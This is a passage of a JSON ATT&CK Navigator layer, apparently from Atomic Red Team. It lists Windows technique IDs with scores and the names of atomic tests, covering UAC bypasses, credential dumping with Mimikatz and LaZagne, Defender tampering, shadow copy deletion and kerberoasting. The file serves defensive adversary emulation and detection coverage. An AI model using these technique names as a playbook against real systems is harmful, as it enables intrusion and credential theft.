Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":10,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with Sysinternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":2,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":9,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1518","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":4,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":4,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service Installation PowerShell\n- TinyTurla backdoor service w64time\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to cmd.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":16,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":1,"enabled":true,"comment":"\n- Modify SSP configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":23,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":13,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":50,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":28,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender with Defender Control\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- 